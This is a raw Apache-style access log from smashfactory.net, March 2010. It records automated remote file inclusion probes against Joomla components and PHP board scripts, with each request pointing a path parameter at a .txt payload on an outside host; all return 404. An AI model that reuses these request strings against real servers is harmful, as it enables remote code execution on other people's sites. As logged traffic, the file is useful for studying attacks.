64.15.158.246 - - [09/Mar/2010:19:36:46 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
64.15.158.246 - - [09/Mar/2010:19:36:46 -0800] "GET /main.php?sayfa=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
64.15.158.246 - - [09/Mar/2010:19:36:49 -0800] "GET /main.php?sayfa=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
64.15.158.246 - - [09/Mar/2010:19:36:49 -0800] "GET /logs//main.php?sayfa=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
64.15.158.246 - - [09/Mar/2010:19:36:49 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
77.92.143.92 - - [09/Mar/2010:19:37:17 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/idi.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "smashfactory.net"
77.92.143.92 - - [09/Mar/2010:19:37:17 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/idi.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "smashfactory.net"
77.92.143.92 - - [09/Mar/2010:19:37:17 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/idi.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "smashfactory.net"
77.92.143.92 - - [09/Mar/2010:19:37:34 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/idi.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "smashfactory.net"
77.92.143.92 - - [09/Mar/2010:19:37:34 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/idi.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "smashfactory.net"
77.92.143.92 - - [09/Mar/2010:19:37:34 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/idi.txt?%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "smashfactory.net"
74.54.22.2 - - [09/Mar/2010:19:38:10 -0800] "GET /component/option,com_joomap//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
74.54.22.2 - - [09/Mar/2010:19:38:10 -0800] "GET /logs//component/option,com_joomap//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
74.54.22.2 - - [09/Mar/2010:19:38:10 -0800] "GET /logs/access.log//component/option,com_joomap//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
74.54.22.2 - - [09/Mar/2010:19:38:29 -0800] "GET /logs//component/option,com_joomap//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
74.54.22.2 - - [09/Mar/2010:19:38:29 -0800] "GET /logs/access.log//component/option,com_joomap//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
74.54.22.2 - - [09/Mar/2010:19:38:29 -0800] "GET /component/option,com_joomap//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
74.54.22.2 - - [09/Mar/2010:19:39:19 -0800] "GET /logs/access.log%20%20//component/option,com_joomap//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
74.54.22.2 - - [09/Mar/2010:19:39:32 -0800] "GET /logs/access.log%20%20//component/option,com_joomap//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
88.131.106.8 - - [09/Mar/2010:19:40:19 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.smashfactory.net"
88.131.106.8 - - [09/Mar/2010:19:40:21 -0800] "GET / HTTP/1.0" 200 763 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.smashfactory.net"
186.28.232.13 - - [09/Mar/2010:19:41:06 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.smashfactory.net"
186.28.232.13 - - [09/Mar/2010:19:41:06 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.smashfactory.net"
186.28.232.13 - - [09/Mar/2010:19:41:06 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.smashfactory.net"
87.106.132.3 - - [09/Mar/2010:19:41:06 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:19:41:06 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:19:41:06 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.190.166.35 - - [09/Mar/2010:19:41:42 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.smashfactory.net"
195.190.166.35 - - [09/Mar/2010:19:41:42 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.smashfactory.net"
195.190.166.35 - - [09/Mar/2010:19:41:42 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.smashfactory.net"
58.230.162.220 - - [09/Mar/2010:19:42:07 -0800] "GET /logs/access.log///////delete_all.php?board_skin_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
64.15.158.246 - - [09/Mar/2010:19:42:38 -0800] "GET /logs/access.log//main.php?sayfa=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
64.15.158.246 - - [09/Mar/2010:19:42:44 -0800] "GET /logs/access.log//main.php?sayfa=http://www.rentitout.com.ua//backups/ikhy1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
91.142.208.158 - - [09/Mar/2010:19:43:22 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.smashfactory.net"
91.142.208.158 - - [09/Mar/2010:19:43:22 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.smashfactory.net"
91.142.208.158 - - [09/Mar/2010:19:43:22 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.smashfactory.net"
186.28.232.13 - - [09/Mar/2010:19:45:26 -0800] "GET /logs/access.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.smashfactory.net"
222.237.78.176 - - [09/Mar/2010:19:45:55 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
222.237.78.176 - - [09/Mar/2010:19:46:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
222.237.78.176 - - [09/Mar/2010:19:46:02 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.132.3 - - [09/Mar/2010:19:46:08 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
58.230.162.220 - - [09/Mar/2010:19:48:58 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
58.230.162.220 - - [09/Mar/2010:19:48:58 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
58.230.162.220 - - [09/Mar/2010:19:48:58 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
125.160.17.201 - - [09/Mar/2010:19:49:19 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
125.160.17.201 - - [09/Mar/2010:19:49:19 -0800] "GET /logs/access.log%20%20//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
125.160.17.201 - - [09/Mar/2010:19:49:19 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
91.142.208.158 - - [09/Mar/2010:19:52:27 -0800] "GET /logs/access.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.smashfactory.net"
119.148.74.195 - - [09/Mar/2010:19:52:59 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
119.148.74.195 - - [09/Mar/2010:19:52:59 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
119.148.74.195 - - [09/Mar/2010:19:52:59 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
119.148.74.195 - - [09/Mar/2010:19:53:37 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
119.148.74.195 - - [09/Mar/2010:19:53:37 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
119.148.74.195 - - [09/Mar/2010:19:53:38 -0800] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.210.178 - - [09/Mar/2010:19:55:50 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.210.178 - - [09/Mar/2010:19:55:50 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
87.106.210.178 - - [09/Mar/2010:19:55:50 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://lclink.co.kr/bbs/icon/private_icon/templates/sken/id1(pirates).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
119.148.74.195 - - [09/Mar/2010:19:56:43 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
119.148.74.195 - - [09/Mar/2010:19:57:13 -0800] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.guianossacidade.com.br/logo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
58.230.162.220 - - [09/Mar/2010:19:57:28 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.lumixclub.com/bbs/sex/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:01 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:02 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:02 -0800] "GET /logs/access.log%20%20///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:02 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:03 -0800] "GET /logs/access.log%20%20///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:03 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:12 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:12 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:12 -0800] "GET /logs/access.log///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:12 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:12 -0800] "GET /logs/access.log///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:14:12 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.251.189.204 - - [09/Mar/2010:20:16:52 -0800] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.251.189.204 - - [09/Mar/2010:20:16:52 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.251.189.204 - - [09/Mar/2010:20:16:52 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:16:56 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:16:56 -0800] "GET /logs/access.log///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:16:56 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:17:04 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:17:04 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.239.206.144 - - [09/Mar/2010:20:17:04 -0800] "GET /logs/access.log///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.251.189.204 - - [09/Mar/2010:20:18:01 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.251.189.204 - - [09/Mar/2010:20:18:01 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
213.251.189.204 - - [09/Mar/2010:20:18:01 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.emotions.com.mx/libreria/joomla??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:19:47 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:19:47 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:19:47 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:19:47 -0800] "GET /logs/access.log///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:19:47 -0800] "GET /logs/access.log///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:19:47 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:20:11 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:20:11 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:20:11 -0800] "GET /logs/access.log%20%20///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:20:11 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:20:11 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:20:11 -0800] "GET /logs/access.log%20%20///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:33:41 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:33:41 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:33:41 -0800] "GET /logs/access.log%20%20///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:33:57 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:33:57 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:33:57 -0800] "GET /logs/access.log%20%20///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:34:00 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:34:00 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
69.163.150.203 - - [09/Mar/2010:20:36:03 -0800] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
69.163.150.203 - - [09/Mar/2010:20:36:03 -0800] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
69.163.150.203 - - [09/Mar/2010:20:36:03 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.foodntop.com/bbs/data/notice_1/robot.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:37:21 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:37:21 -0800] "GET /logs/access.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
200.93.147.154 - - [09/Mar/2010:20:37:24 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:37:57 -0800] "GET /logs/access.log%20%20///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:37:57 -0800] "GET /logs///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:37:57 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:37:58 -0800] "GET /logs/access.log%20%20///skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
195.95.229.230 - - [09/Mar/2010:20:37:58 -0800] "GET //skin/board/moviefl/download.php?board_skin_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.smashfactory.net"
